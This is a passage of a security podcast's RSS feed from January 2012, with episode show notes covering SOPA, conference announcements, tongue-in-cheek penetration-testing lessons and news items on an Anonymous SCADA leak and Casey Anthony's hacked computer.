<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The humor in all of this is that Comcast is a big supporter of SOPA. But now it&rsquo;s not only made its network incompatible with SOPA, it&rsquo;s also undercut the need for SOPA somewhat by putting in place technology that &nbsp;helps legitimize the identity of websites to improve accountability and security.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://motherboard.vice.com/2012/1/6/hollywood-s-last-stand-the-desperate-plot-behind-the-sopa-opera--2"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://motherboard.vice.com/2012/1/6/hollywood-s-last-stand-the-desperate-plot-behind-the-sopa-opera&#8211;2</span></a></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Look back at any period of rapid technological progress and you&rsquo;ll find two groups of individuals: Pioneers tirelessly charting new territory for the benefit of the species and members of the old order standing against the tide to fight back the phantom of their own perceived obsolescence. The debate over the Stop Online Piracy Act boils down to exactly this &mdash; a desperate last-ditch effort by the reigning Hollywood and recording industry elite to preserve their crumbling empires, no matter the cost to free speech, innovation and security.</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&rsquo;s not the first time this has happened, and it certainly won&rsquo;t be the last. Jump back a hundred or so years to one example famously cited by</span><a href="http://motherboard.vice.com/2011/11/22/in-the-net-censorship-copyfight-lessig-strikes-at-the-root"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">copyright law professor Lawrence Lessig</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, in which American march composer John Philip Sousa speaks out against a machine called the gramophone that played recorded music without the need of live musicians.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;When I was a boy&hellip;in front of every house in the summer evenings, you would find young people together singing the songs of the day or old songs,&rdquo; Sousa said at a Congressional hearing in 1906. &ldquo;Today you hear these infernal machines going night and day. We will not have a vocal cord left. The vocal cord will be eliminated by a process of evolution, as was the tail of man when he came from the ape.&rdquo; Ironically, he was rallying against the very recording industry that went on to rally against recordable cassette tapes, and is currently rallying against the internet.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></div>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-566-scada-mdcu-sniffing-playbook-ssids-dnssec-sopa/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3365/0/infosec-daily-podcast-episode-566.mp3" length="21816151" type="audio/mpeg" />
		<itunes:duration>0:45:24</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 566 for January 12, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Adrian Crenshaw, Karthik Rangarajan, and Geordy Rostad.
	&#160;
Announcements:
Information Security Blogger Awards 2012
	Since we were over [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 566 for January 12, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Adrian Crenshaw, Karthik Rangarajan, and Geordy Rostad.
	&#160;
Announcements:
Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	New England InfoSec Tweetup
	When: January 21, 2012
	Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH
	http://neistu3.eventbrite.com/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	Hit up anyone in NOVA Hackers
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	BSides Chicago
	When: Saturday, April 28th, 2012
	Where: Volcano Room (further info coming)
	Cost: Free (as always!) &#8211; Registration opening soon!
	http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012
	They&#8217;re looking for sponsors, so if you know someone, pass it on.
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go tohttp://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://www.v3.co.uk/v3-uk/news/2137158/anonymous-targets-israel-publishing-scada-log-details
Hacktivist group Anonymous has released what it claims to be a series of log-in details for Israeli SCADA systems, in what could be retaliation for Tel Aviv&#39;s hardline reaction to the recent mass credit card hack on thousa[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 565 &#8211; Pentesting Lessons, Casey Anthony, USCC, QR Codes, AnonBomb &amp; Public Code</title>
		<link>http://www.isdpodcast.com/episode-565-pentesting-lessons-casey-anthony-uscc-qr-codes-anonbomb-public-code</link>
		<comments>http://www.isdpodcast.com/episode-565-pentesting-lessons-casey-anthony-uscc-qr-codes-anonbomb-public-code#comments</comments>
		<pubDate>Thu, 12 Jan 2012 01:44:52 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3357</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 565 for January 11, 2012.&#160; Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Keith Pachulski, and Varun Sharma. &#160; Announcements: Information Security Blogger Awards 2012 Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 565 for January 11, 2012.&nbsp; Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Keith Pachulski, and Varun Sharma.</span><br />
	&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></div>
<p><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.ashimmy.com</span></a><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New England InfoSec Tweetup</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH</span><br />
	<a href="http://neistu3.eventbrite.com/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://neistu3.eventbrite.com/</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Schmoocon Epilogue</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: After Schmoocon</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington, DC</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hit up anyone in NOVA Hackers</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9 <br />
	Where: Seattle, Washington</span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Chicago<br />
	</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th, 2012<br />
	Where: Volcano Room (further info coming)</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cost: Free (as always!) &#8211; Registration opening soon!</span><br />
	<a href="http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">They&rsquo;re looking for sponsors, so if you know someone, pass it on.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Pentest Lessons:</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Adam Compton &amp; Zac Wagle&#39;s should get credit for the &quot;Pentest Lessons&quot; idea. They also started a twitter account:</span><a href="https://twitter.com/pentestlessons"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://twitter.com/pentestlessons</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 1:</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Keep your employees SO busy that they don&rsquo;t have time to get pwnd.</span><br />
	<span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 2: </span><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Make sure you&#39;re going to get paid, before you submit your invoice.</span><br />
	<span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 3: </span><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Don&rsquo;t sign shit!</span><br />
	<span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 4: </span><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Pre-meeting doxing, and social engineer to be what your client needs you to be&rdquo;</span><br />
	<span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 5:</span><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Following don&rsquo;t sign shit, remember who is paying the bill. But that does not mean you need to be a complete passive tool while dealing with the customer. Be professional and to the point. Don&rsquo;t ramble.</span><br />
	<span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 6</span><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: If you do not know how to answer a question, don&#39;t make shit up.</span><br />
	&nbsp;</p>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></div>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span>&nbsp;<a href="http://today.msnbc.msn.com/id/45956305/ns/today-today_people/"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://today.msnbc.msn.com/id/45956305/ns/today-today_people/</span></a></div>
<p><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It would seem that Casey Anthony has complained that someone hacked her computer and posted some personal videos on YouTube. &nbsp;</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;My computer was recently hacked, private videos that were recorded,&rdquo; she states in the report. And a Florida official wrote, &ldquo;Offender upset that computer was hacked and videos have been downloaded to YouTube.&rdquo;</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Casey Anthony is serving out a year&rsquo;s probation for writing bad checks. &nbsp;&nbsp;&nbsp;The second video, believed to have been recorded on Christmas day, showed Anthony had changed her locks to red while talking excitedly about her new body piercings. &ldquo;I just pierced my nose last night&hellip;very excited,&rdquo; she says.</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anthony says &ldquo;I,&rdquo; &ldquo;me,&rdquo; &ldquo;my&rdquo; and &ldquo;mine&rdquo; 40 times in the first video but never mentions her deceased daughter Caylee or the trial that found her not guilty of the baby&#39;s murder. Baez said no one should try to read into Anthony&rsquo;s mind.</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Baez told Rivera he is searching for the source of the video leaks and may seek criminal prosecution. </span></p>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></div>
